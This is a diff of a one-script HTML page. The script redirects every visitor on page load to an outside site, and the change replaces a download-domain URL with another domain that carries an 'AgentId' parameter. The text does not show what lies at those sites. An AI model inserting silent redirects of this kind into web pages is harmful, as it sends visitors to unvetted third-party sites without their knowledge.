--- a/647093.html
+++ b/647093.html
@@ -1,3 +1,3 @@
 <script>
-  window.location.href="https://dl.hawcyy.com/?parent=647093&t=1592613932"
+  window.location.href="https://main.RY872.com/?AgentId=202048"
 </script>
